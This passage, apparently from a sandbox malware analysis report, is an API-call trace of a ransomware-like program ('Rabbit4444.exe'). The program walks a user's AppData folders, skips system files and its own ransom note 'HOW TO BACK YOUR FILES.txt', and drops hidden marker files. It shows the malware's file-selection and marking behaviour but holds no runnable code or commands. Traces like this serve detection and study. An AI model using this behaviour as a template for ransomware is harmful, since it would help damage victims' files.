cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0064.720] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0064.720] lstrcpyW (in: lpString1=0x130ebe6, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0064.721] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0064.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0064.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x1161e0 [0064.721] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x122008 [0064.721] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71ce0e7e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0064.721] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0064.721] lstrcpyW (in: lpString1=0x130ebe6, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0064.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0064.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x122a80 [0064.721] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x122368 [0064.721] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71ce0e7e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0064.721] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0064.721] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.722] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.722] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.722] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.722] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.722] CloseHandle (hObject=0x2a0) returned 1 [0064.722] CloseHandle (hObject=0x2cc) returned 1 [0064.723] GetCurrentThreadId () returned 0xd98 [0064.723] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0064.723] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp" [0064.723] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122a80 | out: hHeap=0xe0000) returned 1 [0064.723] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0064.723] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp" [0064.723] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp\\" [0064.723] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0064.723] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.725] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.768] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.769] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.769] CloseHandle (hObject=0x2cc) returned 1 [0064.770] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp") returned 91 [0064.770] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.770] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe5fce5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.770] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.770] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.770] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.770] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.770] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe5fce5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.770] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.770] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.770] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.770] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.770] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.770] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe5fce5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe5fce5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefed2484, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.770] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.770] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.770] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe5fce5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe5fce5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefed2484, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.770] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.770] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.770] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.771] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.771] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.772] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.772] CloseHandle (hObject=0x2a0) returned 1 [0064.772] CloseHandle (hObject=0x2cc) returned 1 [0064.772] GetCurrentThreadId () returned 0xd98 [0064.772] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0064.772] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory" [0064.772] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1161e0 | out: hHeap=0xe0000) returned 1 [0064.772] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0064.772] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory" [0064.772] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory\\" [0064.772] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0064.772] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.773] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.776] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.776] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.777] CloseHandle (hObject=0x2cc) returned 1 [0064.777] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory") returned 98 [0064.777] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.777] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefed2484, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0064.777] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.777] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.777] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.777] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.777] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefed2484, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.777] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.777] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.778] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.778] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.778] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.778] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefed2484, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefed2484, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefef8aee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.778] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.778] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.778] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefed2484, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefed2484, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefef8aee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.778] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0064.778] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.778] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.778] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.782] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.782] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.782] CloseHandle (hObject=0x2a0) returned 1 [0064.782] CloseHandle (hObject=0x2cc) returned 1 [0064.782] GetCurrentThreadId () returned 0xd98 [0064.782] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0064.782] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies" [0064.783] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116110 | out: hHeap=0xe0000) returned 1 [0064.783] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0064.783] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies" [0064.783] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies\\" [0064.783] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0064.783] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.785] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.787] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.788] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.788] CloseHandle (hObject=0x2cc) returned 1 [0064.789] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies") returned 98 [0064.789] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.789] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefef8aee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0064.789] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.789] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.789] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.789] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.789] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, 